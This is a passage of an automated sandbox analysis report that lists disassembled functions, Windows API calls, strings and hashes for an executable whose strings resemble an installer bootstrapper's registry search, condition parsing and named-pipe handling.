                                                                                                                                                                    • NetFxSection.%ls, xrefs: 0092D509
                                                                                                                                                                    • Failed to allocate netfx chainer arguments., xrefs: 0092D593
                                                                                                                                                                    • NetFxEvent.%ls, xrefs: 0092D52B
                                                                                                                                                                    • Failed to convert netfx chainer guid into string., xrefs: 0092D4FB
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Wait$ErrorLastMutexObjectReleaseSingle$CloseCreateHandleProcess$CodeEventExitFromMultipleObjectsStringUuid
                                                                                                                                                                    • String ID: %ls /pipe %ls$D$Failed to CreateProcess on path: %ls$Failed to allocate event name.$Failed to allocate netfx chainer arguments.$Failed to allocate section name.$Failed to convert netfx chainer guid into string.$Failed to create netfx chainer guid.$Failed to create netfx chainer.$Failed to get netfx return code.$Failed to process netfx chainer message.$Failed to wait for netfx chainer process to complete$NetFxChainer.cpp$NetFxEvent.%ls$NetFxSection.%ls
                                                                                                                                                                    • API String ID: 1533322865-1825855094
                                                                                                                                                                    • Opcode ID: 7ace09c3e3034404c286f101e06bb3e9ee0c8bb6025b09d8a1089738e9d8a00b
                                                                                                                                                                    • Instruction ID: 1f588cb36067b02b6165808e75224cfea8baa32ca2e95ae2aa897716e5e6b1b1
                                                                                                                                                                    • Opcode Fuzzy Hash: 7ace09c3e3034404c286f101e06bb3e9ee0c8bb6025b09d8a1089738e9d8a00b
                                                                                                                                                                    • Instruction Fuzzy Hash: CAA1AC72D01228AFDB209BA4DC85FAEB7B8BB44720F104565FA08FB295D7749D408F91
                                                                                                                                                                    Function 009154DC Relevance: 45.7, APIs: 17, Strings: 9, Instructions: 229filepipesleepCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,00000000,?,0094B500,?,00000000,?,0090452F,?,0094B500), ref: 009154FD
                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(?,0090452F,?,0094B500), ref: 00915508
                                                                                                                                                                    • SetNamedPipeHandleState.KERNEL32(?,000000FF,00000000,00000000,?,0090452F,?,0094B500), ref: 0091553F
                                                                                                                                                                    • ConnectNamedPipe.KERNEL32(?,00000000,?,0090452F,?,0094B500), ref: 00915554
                                                                                                                                                                    • GetLastError.KERNEL32(?,0090452F,?,0094B500), ref: 0091555E
                                                                                                                                                                    • Sleep.KERNEL32(00000064,?,0090452F,?,0094B500), ref: 00915593
                                                                                                                                                                    • SetNamedPipeHandleState.KERNEL32(?,00000000,00000000,00000000,?,0090452F,?,0094B500), ref: 009155B6
                                                                                                                                                                    • WriteFile.KERNEL32(?,crypt32.dll,00000004,00000000,00000000,?,0090452F,?,0094B500), ref: 009155D1
                                                                                                                                                                    • WriteFile.KERNEL32(?,0090452F,0094B500,00000000,00000000,?,0090452F,?,0094B500), ref: 009155EC
                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000004,00000000,00000000,?,0090452F,?,0094B500), ref: 00915607
                                                                                                                                                                    • ReadFile.KERNEL32(?,00000000,00000004,00000000,00000000,?,0090452F,?,0094B500), ref: 00915622
                                                                                                                                                                    • GetLastError.KERNEL32(?,0090452F,?,0094B500), ref: 0091567D
                                                                                                                                                                    • GetLastError.KERNEL32(?,0090452F,?,0094B500), ref: 009156B1
                                                                                                                                                                    • GetLastError.KERNEL32(?,0090452F,?,0094B500), ref: 009156E5
                                                                                                                                                                    • GetLastError.KERNEL32(?,0090452F,?,0094B500), ref: 00915719
                                                                                                                                                                    • GetLastError.KERNEL32(?,0090452F,?,0094B500), ref: 0091574A
                                                                                                                                                                    • GetLastError.KERNEL32(?,0090452F,?,0094B500), ref: 0091577B
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$File$NamedPipeWrite$HandleState$ConnectCurrentProcessReadSleeplstrlen
                                                                                                                                                                    • String ID: Failed to read ACK from pipe.$Failed to reset pipe to blocking.$Failed to set pipe to non-blocking.$Failed to wait for child to connect to pipe.$Failed to write our process id to pipe.$Failed to write secret length to pipe.$Failed to write secret to pipe.$crypt32.dll$pipe.cpp
                                                                                                                                                                    • API String ID: 2944378912-2047837012
                                                                                                                                                                    • Opcode ID: a5a6be4bb4aefaf839935c2a158a7e57274f48fa23194f656c4e7d8cb9b911b0
                                                                                                                                                                    • Instruction ID: 7f73a3eb6ec465e5708569cb832a3917ca7cd5cf3d2d428191987280cc7ddd71
                                                                                                                                                                    • Opcode Fuzzy Hash: a5a6be4bb4aefaf839935c2a158a7e57274f48fa23194f656c4e7d8cb9b911b0
                                                                                                                                                                    • Instruction Fuzzy Hash: 7771B776E50629EBD720DAA58C4AFEE66ACAF84B55F134525BD00FB1C0E774CD8087E0
                                                                                                                                                                    Function 0090A416 Relevance: 44.0, APIs: 8, Strings: 17, Instructions: 299registryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • _MREFOpen@16.MSPDB140-MSVCRT ref: 0090A45A
                                                                                                                                                                    • _MREFOpen@16.MSPDB140-MSVCRT ref: 0090A480
                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000,?,00000000,?,?,?,?,?), ref: 0090A768
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to clear variable., xrefs: 0090A4D8
                                                                                                                                                                    • Failed to open registry key., xrefs: 0090A4ED
                                                                                                                                                                    • Failed to format key string., xrefs: 0090A465
                                                                                                                                                                    • Failed to query registry key value size., xrefs: 0090A554
                                                                                                                                                                    • Registry value not found. Key = '%ls', Value = '%ls', xrefs: 0090A51C
                                                                                                                                                                    • Failed to format value string., xrefs: 0090A48B
                                                                                                                                                                    • Failed to read registry value., xrefs: 0090A6F6
                                                                                                                                                                    • Unsupported registry key value type. Type = '%u', xrefs: 0090A608
                                                                                                                                                                    • search.cpp, xrefs: 0090A54A, 0090A57D, 0090A5D0, 0090A6D3
                                                                                                                                                                    • Failed to set variable., xrefs: 0090A72B
                                                                                                                                                                    • Failed to query registry key value., xrefs: 0090A5DA
                                                                                                                                                                    • Failed to allocate memory registry value., xrefs: 0090A587
                                                                                                                                                                    • RegistrySearchValue failed: ID '%ls', HRESULT 0x%x, xrefs: 0090A740
                                                                                                                                                                    • Registry key not found. Key = '%ls', xrefs: 0090A4B4
                                                                                                                                                                    • Failed to get expand environment string., xrefs: 0090A6DD
                                                                                                                                                                    • Failed to change value type., xrefs: 0090A70F
                                                                                                                                                                    • Failed to allocate string buffer., xrefs: 0090A667
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Open@16$Close
                                                                                                                                                                    • String ID: Failed to allocate memory registry value.$Failed to allocate string buffer.$Failed to change value type.$Failed to clear variable.$Failed to format key string.$Failed to format value string.$Failed to get expand environment string.$Failed to open registry key.$Failed to query registry key value size.$Failed to query registry key value.$Failed to read registry value.$Failed to set variable.$Registry key not found. Key = '%ls'$Registry value not found. Key = '%ls', Value = '%ls'$RegistrySearchValue failed: ID '%ls', HRESULT 0x%x$Unsupported registry key value type. Type = '%u'$search.cpp
                                                                                                                                                                    • API String ID: 2348241696-3124384294
                                                                                                                                                                    • Opcode ID: 4baa23e506b7c92741f598a1726735006aeef7ca380f8561c7702166bc2891cc
                                                                                                                                                                    • Instruction ID: 8be1f0f76f4e209f6b81634eb2b72db90f5ba504de25d752635176f0fe024c01
                                                                                                                                                                    • Opcode Fuzzy Hash: 4baa23e506b7c92741f598a1726735006aeef7ca380f8561c7702166bc2891cc
                                                                                                                                                                    • Instruction Fuzzy Hash: 9EA1AF73D40329BFCB229AA4CC45EAEBA78BF48710F158561F910BA1D1D7759E00ABD2
                                                                                                                                                                    Function 00905770 Relevance: 42.5, APIs: 5, Strings: 19, Instructions: 479stringCOMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(00000100,00000100,00000100,00000000,00000000,00000000,?,0090A8B4,00000100,000002C0,000002C0,00000100), ref: 00905795
                                                                                                                                                                    • lstrlenW.KERNEL32(000002C0,?,0090A8B4,00000100,000002C0,000002C0,00000100), ref: 0090579F
                                                                                                                                                                    • _wcschr.LIBVCRUNTIME ref: 009059A7
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(00000100,00000000,000002C0,000002C0,00000000,000002C0,00000001,?,0090A8B4,00000100,000002C0,000002C0,00000100), ref: 00905C4A
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSection$EnterLeave_wcschrlstrlen
                                                                                                                                                                    • String ID: *****$Failed to allocate buffer for format string.$Failed to allocate record.$Failed to allocate string.$Failed to allocate variable array.$Failed to append placeholder.$Failed to append string.$Failed to copy string.$Failed to determine variable visibility: '%ls'.$Failed to format placeholder string.$Failed to format record.$Failed to get formatted length.$Failed to get variable name.$Failed to reallocate variable array.$Failed to set record format string.$Failed to set record string.$Failed to set variable value.$[%d]$variable.cpp
                                                                                                                                                                    • API String ID: 1026845265-2050445661
                                                                                                                                                                    • Opcode ID: 38f530708f201b550b188e4b8a2546690bcd95be42c2fac5fa92e479ec2cf4fd
                                                                                                                                                                    • Instruction ID: 1cdf82e63a38437ea7f0c78420f7958c85f9288a623ad7ff5e97f1d1b5851f5b
                                                                                                                                                                    • Opcode Fuzzy Hash: 38f530708f201b550b188e4b8a2546690bcd95be42c2fac5fa92e479ec2cf4fd
                                                                                                                                                                    • Instruction Fuzzy Hash: D6F18776D01629EFDB10DFA48845EAF7BA8EB84B14F168529FD14A72C0D7349D01DFA0
                                                                                                                                                                    Function 0092CE81 Relevance: 40.5, APIs: 12, Strings: 11, Instructions: 240synchronizationCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 0090394F: GetProcessHeap.KERNEL32(?,000001C7,?,00902274,000001C7,00000001,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903960
                                                                                                                                                                      • Part of subcall function 0090394F: RtlAllocateHeap.NTDLL(00000000,?,00902274,000001C7,00000001,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903967
                                                                                                                                                                    • CreateEventW.KERNEL32(00000000,00000000,00000000,?,00000000,00000018,00000001,?,00000000,?,?,0092D558,?,?,?), ref: 0092CEC7
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,0092D558,?,?,?), ref: 0092CED4
                                                                                                                                                                    • ReleaseMutex.KERNEL32(?), ref: 0092D13C
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$AllocateCreateErrorEventLastMutexProcessRelease
                                                                                                                                                                    • String ID: %ls_mutex$%ls_send$Failed to MapViewOfFile for %ls.$Failed to allocate memory for NetFxChainer struct.$Failed to create event: %ls$Failed to create mutex: %ls$Failed to memory map cabinet file: %ls$NetFxChainer.cpp$failed to allocate memory for event name$failed to allocate memory for mutex name$failed to copy event name to shared memory structure.
                                                                                                                                                                    • API String ID: 3944734951-2991465304
                                                                                                                                                                    • Opcode ID: da99b922a288d7081221005990e25427707fb2498a474229ad043fab76fc0b3e
                                                                                                                                                                    • Instruction ID: 682e237d1eb611c1f3808a546d33f987307d1e29877735ae83508e5600f8e0a4
                                                                                                                                                                    • Opcode Fuzzy Hash: da99b922a288d7081221005990e25427707fb2498a474229ad043fab76fc0b3e
                                                                                                                                                                    • Instruction Fuzzy Hash: 538159B6A81332BBC7218B659C49F9B7BA8BF45720F114151FE14AB291E770DD00CAE0
                                                                                                                                                                    Function 0090EA42 Relevance: 40.5, APIs: 4, Strings: 19, Instructions: 231COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 009432F3: VariantInit.OLEAUT32(?), ref: 00943309
                                                                                                                                                                      • Part of subcall function 009432F3: SysAllocString.OLEAUT32(?), ref: 00943325
                                                                                                                                                                      • Part of subcall function 009432F3: VariantClear.OLEAUT32(?), ref: 009433AC
                                                                                                                                                                      • Part of subcall function 009432F3: SysFreeString.OLEAUT32(00000000), ref: 009433B7
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,000000FF,000000FF,Detect,000000FF,?,0094CA9C,?,?,Action,?,?,?,00000000,00905445), ref: 0090EB13
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,Upgrade,000000FF), ref: 0090EB5D
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to resize Addon code array in registration, xrefs: 0090EC3C
                                                                                                                                                                    • Invalid value for @Action: %ls, xrefs: 0090EC52
                                                                                                                                                                    • Upgrade, xrefs: 0090EB50
                                                                                                                                                                    • Failed to get @Action., xrefs: 0090EC69
                                                                                                                                                                    • Failed to resize Patch code array in registration, xrefs: 0090EC43
                                                                                                                                                                    • Addon, xrefs: 0090EB9A
                                                                                                                                                                    • Detect, xrefs: 0090EB04
                                                                                                                                                                    • RelatedBundle, xrefs: 0090EA50
                                                                                                                                                                    • Failed to resize Upgrade code array in registration, xrefs: 0090EC35
                                                                                                                                                                    • Failed to get RelatedBundle element count., xrefs: 0090EA97
                                                                                                                                                                    • Failed to get RelatedBundle nodes, xrefs: 0090EA72
                                                                                                                                                                    • Failed to get @Id., xrefs: 0090EC62
                                                                                                                                                                    • comres.dll, xrefs: 0090EB26
                                                                                                                                                                    • version.dll, xrefs: 0090EB70
                                                                                                                                                                    • Failed to get next RelatedBundle element., xrefs: 0090EC70
                                                                                                                                                                    • Failed to resize Detect code array in registration, xrefs: 0090EC2E
                                                                                                                                                                    • Action, xrefs: 0090EAD0
                                                                                                                                                                    • Patch, xrefs: 0090EBDD
                                                                                                                                                                    • cabinet.dll, xrefs: 0090EBBA
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: String$CompareVariant$AllocClearFreeInit
                                                                                                                                                                    • String ID: Action$Addon$Detect$Failed to get @Action.$Failed to get @Id.$Failed to get RelatedBundle element count.$Failed to get RelatedBundle nodes$Failed to get next RelatedBundle element.$Failed to resize Addon code array in registration$Failed to resize Detect code array in registration$Failed to resize Patch code array in registration$Failed to resize Upgrade code array in registration$Invalid value for @Action: %ls$Patch$RelatedBundle$Upgrade$cabinet.dll$comres.dll$version.dll
                                                                                                                                                                    • API String ID: 702752599-259800149
                                                                                                                                                                    • Opcode ID: 2f1f98701fa09e10717794e94f999142e82ad8de5b09bd84ba2a4980a70f1171
                                                                                                                                                                    • Instruction ID: 012c65b6de4e7bc9ba7d0b07e6e0b7656c960cd73e57b8646e3bc5de76fb7998
                                                                                                                                                                    • Opcode Fuzzy Hash: 2f1f98701fa09e10717794e94f999142e82ad8de5b09bd84ba2a4980a70f1171
                                                                                                                                                                    • Instruction Fuzzy Hash: 7E71BC31A4462ABFDB10CFA4C942FAEB7B4FF44724F204A54E961A72C1D771AE41CB90
                                                                                                                                                                    Function 009146DC Relevance: 36.9, APIs: 10, Strings: 11, Instructions: 185fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(?,8000FFFF,feclient.dll,?,00914BF5,0094B4E8,?,feclient.dll,00000000,?,?), ref: 009146F3
                                                                                                                                                                    • ReadFile.KERNEL32(feclient.dll,feclient.dll,00000004,?,00000000,?,00914BF5,0094B4E8,?,feclient.dll,00000000,?,?), ref: 00914714
                                                                                                                                                                    • GetLastError.KERNEL32(?,00914BF5,0094B4E8,?,feclient.dll,00000000,?,?), ref: 0091471A
                                                                                                                                                                    • ReadFile.KERNEL32(feclient.dll,00000000,0094B518,?,00000000,00000000,0094B519,?,00914BF5,0094B4E8,?,feclient.dll,00000000,?,?), ref: 009147A8
                                                                                                                                                                    • GetLastError.KERNEL32(?,00914BF5,0094B4E8,?,feclient.dll,00000000,?,?), ref: 009147AE
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFileLastRead$CurrentProcess
                                                                                                                                                                    • String ID: Failed to allocate buffer for verification secret.$Failed to inform parent process that child is running.$Failed to read size of verification secret from parent pipe.$Failed to read verification process id from parent pipe.$Failed to read verification secret from parent pipe.$Verification process id from parent does not match.$Verification secret from parent does not match.$Verification secret from parent is too big.$feclient.dll$msasn1.dll$pipe.cpp
                                                                                                                                                                    • API String ID: 1233551569-452622383
                                                                                                                                                                    • Opcode ID: b629e63a8f50de5e6693daa08fe60b3a960c80c13588fd0f1ca97111e260958d
                                                                                                                                                                    • Instruction ID: a50109df96543eeac94c1d9fdedd024886516648a975e0745a69c49f30e9779e
                                                                                                                                                                    • Opcode Fuzzy Hash: b629e63a8f50de5e6693daa08fe60b3a960c80c13588fd0f1ca97111e260958d
                                                                                                                                                                    • Instruction Fuzzy Hash: 1751E776E84229BBDB21DA958C46FEE766CAB49B25F114165BE10BB1C0D3708D8097E0
                                                                                                                                                                    Function 009227FC Relevance: 36.9, APIs: 3, Strings: 18, Instructions: 145COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: StringVariant$AllocClearFreeInit
                                                                                                                                                                    • String ID: DetectCondition$Failed to get @DetectCondition.$Failed to get @InstallArguments.$Failed to get @Protocol.$Failed to get @RepairArguments.$Failed to get @Repairable.$Failed to get @UninstallArguments.$Failed to parse command lines.$Failed to parse exit codes.$InstallArguments$Invalid protocol type: %ls$Protocol$RepairArguments$Repairable$UninstallArguments$burn$netfx4$none
                                                                                                                                                                    • API String ID: 760788290-1911311241
                                                                                                                                                                    • Opcode ID: a0e45e2be36d3ffb1bcd04378f6f1283e00d5074316ee1a727c829b5f9df5839
                                                                                                                                                                    • Instruction ID: a4a8b9c07736bbe9b6deedbe5dafcb82cb908bd424a3212f178a3e4610ed6cf1
                                                                                                                                                                    • Opcode Fuzzy Hash: a0e45e2be36d3ffb1bcd04378f6f1283e00d5074316ee1a727c829b5f9df5839
                                                                                                                                                                    • Instruction Fuzzy Hash: EA412772E88736B6CB2197759D02F6FB258AF51B35F200321FD20B62C9DBA4994493D1
                                                                                                                                                                    Function 00908F72 Relevance: 35.4, APIs: 8, Strings: 12, Instructions: 430COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetStringTypeW.KERNEL32(00000001,560094DB,00000001,?,00909946,?,00000000,00000000,?,?,0090992E,?,?,00000000,?), ref: 00908FB2
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to parse condition "%ls". Version can have a maximum of 4 parts, at position %d., xrefs: 009091DE
                                                                                                                                                                    • NOT, xrefs: 009092DB
                                                                                                                                                                    • Failed to set symbol value., xrefs: 00909060
                                                                                                                                                                    • Failed to parse condition "%ls". Unexpected '~' operator at position %d., xrefs: 00909408
                                                                                                                                                                    • Failed to parse condition "%ls". Identifier cannot start at a digit, at position %d., xrefs: 009093C4
                                                                                                                                                                    • Failed to parse condition "%ls". Constant too big, at position %d., xrefs: 00909380
                                                                                                                                                                    • Failed to parse condition "%ls". Unexpected character at position %d., xrefs: 00909162
                                                                                                                                                                    • Failed to parse condition "%ls". Unterminated literal at position %d., xrefs: 00909098
                                                                                                                                                                    • Failed to parse condition "%ls". Invalid version format, at position %d., xrefs: 00909242
                                                                                                                                                                    • AND, xrefs: 009092BC
                                                                                                                                                                    • -, xrefs: 00909118
                                                                                                                                                                    • condition.cpp, xrefs: 00909084, 0090914E, 009091CA, 0090922E, 0090936C, 009093B0, 009093F4
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: StringType
                                                                                                                                                                    • String ID: -$AND$Failed to parse condition "%ls". Constant too big, at position %d.$Failed to parse condition "%ls". Identifier cannot start at a digit, at position %d.$Failed to parse condition "%ls". Invalid version format, at position %d.$Failed to parse condition "%ls". Unexpected '~' operator at position %d.$Failed to parse condition "%ls". Unexpected character at position %d.$Failed to parse condition "%ls". Unterminated literal at position %d.$Failed to parse condition "%ls". Version can have a maximum of 4 parts, at position %d.$Failed to set symbol value.$NOT$condition.cpp
                                                                                                                                                                    • API String ID: 4177115715-3594736606
                                                                                                                                                                    • Opcode ID: 07188d5e046f8fdee77093dc50fc7ab9657a8b2a7213aeea6c1fe52e8ac8e2e8
                                                                                                                                                                    • Instruction ID: 48a038ea1a7656be8d3d28efd2f9303d85d4d3cca0355d5677d3a0bc16d8b6ab
                                                                                                                                                                    • Opcode Fuzzy Hash: 07188d5e046f8fdee77093dc50fc7ab9657a8b2a7213aeea6c1fe52e8ac8e2e8
                                                                                                                                                                    • Instruction Fuzzy Hash: 0CF112B5A04211FFDB24CF98C889FBA7BB8FB04704F108556F9159A5D6C3B9DA91CB80
                                                                                                                                                                    Function 00921BB1 Relevance: 35.2, APIs: 4, Strings: 16, Instructions: 212COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 0090394F: GetProcessHeap.KERNEL32(?,000001C7,?,00902274,000001C7,00000001,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903960
                                                                                                                                                                      • Part of subcall function 0090394F: RtlAllocateHeap.NTDLL(00000000,?,00902274,000001C7,00000001,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903967
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,success,000000FF,?,Type,00000000,?,?,00000000,?,00000001,?), ref: 00921CB8
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,error,000000FF), ref: 00921CD6
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
